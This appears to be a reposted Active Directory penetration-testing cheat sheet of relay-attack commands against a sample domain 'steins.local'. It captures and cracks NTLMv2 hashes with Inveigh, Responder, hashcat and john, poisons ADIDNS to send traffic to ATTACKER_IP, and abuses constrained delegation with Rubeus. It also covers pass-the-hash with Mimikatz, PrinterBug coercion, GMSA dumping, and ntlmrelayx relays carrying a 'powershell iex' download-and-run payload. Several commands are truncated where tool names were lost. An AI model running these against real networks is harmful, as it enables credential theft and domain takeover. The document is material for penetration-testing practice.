Relay Attacks - Active Directory Penetration Testing
2021-09-02 02:36:00 Author:查看原文) 阅读量:214 收藏

#Relay attacks - Capturing SMB hashes 

Import-Module .\Inveigh.ps1#Start collecting hashes, we will see hashes whenever a user tries to access something non-existant via SMB
Invoke-Inveigh -ConsoleOutput Y#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
Relay Attack using Responder 

sudo python /usr/share/responder/ -I tun0 -A 
git clone

#adding a DNS Record
sudo python3 -u 'steins.local\username' -p 'P@ssw0rd!' -a add -r 'application.steins.local' -d ATTACKER_IP SERVER_IP

#wait for the victim to access our dns record :) you will get the user's NTLv2 Hash in responder

#crack the hash with john
john --format=netntlmv2 hash --wordlist=wordlist.txt
Abusing ADIDNS and Relaying the Hashes

Import-module .\Invoke-DNSUpdate.ps1
Powershell Invoke-DNSupdate -DNSType A -DNSName test -DNSData -VerboseImport-module .\Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Tombstone -Verbose
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose#Capture all the users hashes
Import-module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y#Relaying the hashes for command execution
Import-module .\InveighRelay.ps1
invoke-inveighrelay -ConsoleOutput Y -Target -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object'')"
Resource Based Constrained Delegation on MSSQL Server 

#Add a DNS Record using
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local#Login to the MSSQL Server and run xpdritree on the dnsname u just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin
#on your Kali box, run
msDS-AllowedToActOnBehalfOfOtherIdentity is added to object SQL_server4$ for object USER
sudo proxychains python steins.local SQL_server4$ USER#View the privileges of the user Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,Principalsallowedtodelegatetoaccount,msds-allowedtodelegateto,trustedtoauthfordelegation #Get TGT and gain access to the server
proxychains python3 ./ -dc-ip -spn cifs/server.steibslocal -impersonate sql_admin steins.local/sql_user:Password@123 export KRB5CCNAME=sql_admin.ccache;sudo proxychains user/[email protected] -k -no-pass -dc-ip -target-ip .\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /pttdir \\server.steins.local\c$psexec \\server.steins.local cmd.exe
Abusing GMSA by relaying 

Import-Module .\Invoke-DNSUpdate.ps1
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData Attacker_IP -Realm steins.local#Invoke a web request from the service that is using GMSA
Invoke-WebRequest -uri "http://might.steins.local" -UseDefaultCredentials#Start capturing the data using ntlmrelayx, if its running as administraor SAM hashes will be dumped
sudo proxychains --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://GMSA_running_machine_IP#incase the data is shown as Password blob, you can use below to convert it to ntlm hash
(ConvertFrom-ADManagedPasswordBlob <blob>).SecureCurrentPassword | ConvertTo-NTHash OR if the user can read GMSA Passwords, you can use to dump the hashes python3 -u 'USERNAME' -p 'P@SSW0RD!' -d 'steins.local' -l 'dc.steins.local'
Abusing PrinterBug

#find machines with unconstrained Delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -ewq $True}#Compromise and login to the machine with unconstrained Delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'

#Run SampleSpool.exe on the unconstrianed degelation enabled machine

SpoolSample.exe TARGET_DOMAIN_FQDN UNCONSTRAINED_DOMAIN_FQDNOR proxychains python3 steins.local/[email protected] KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'sudo proxychains -t smb:// -smb2support
Abusing ADIDNS to Send traffic to the target 

#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose

#assign permissions to the ADIDNS
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
Capturing Hashes using responder and cracking hashes 

sudo proxychains responder -I tun0 -v  

hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force 
Relaying using ntlmrelayx

# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory 
# -c: execute the command 
# -e: execute a binary

ntlmrelayx can automatically dump hashes, when it can access an administrator account. 
so, lookout for the hashes in the output. Also Impacket 0.9.23-dev version has issues with ntlmrelay. better use the stable version.
sudo proxychains -t smb:// -smb2support

Useful commands

sudo proxychains -t smb:// -smb2support

sudo proxychains -t  smb:// -l loot -i  -smb2support -c  "powershell.exe -c iex(new-object'')" 

#Target a specific user on a specific target
sudo proxychains -t smb://[email protected] -smb2support 
Using Inveigh to Capture Hashes

Import-Module .\Inveigh.ps1

#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo  

#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)

Invoke-Inveigh -ConsoleOutput Y -adidns combo  -ADIDNSCredential $Cred -ADIDNSDomain 

Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController

#Capturing Hashes on the target 
Invoke-Inveigh -ConsoleOutput Y -DNS Y 

#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r  /usr/share/hashcat/rules/d3ad0ne.rule

#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target -ShowHelp N -StatusOutput N -Command  "powershell.exe -c whoami"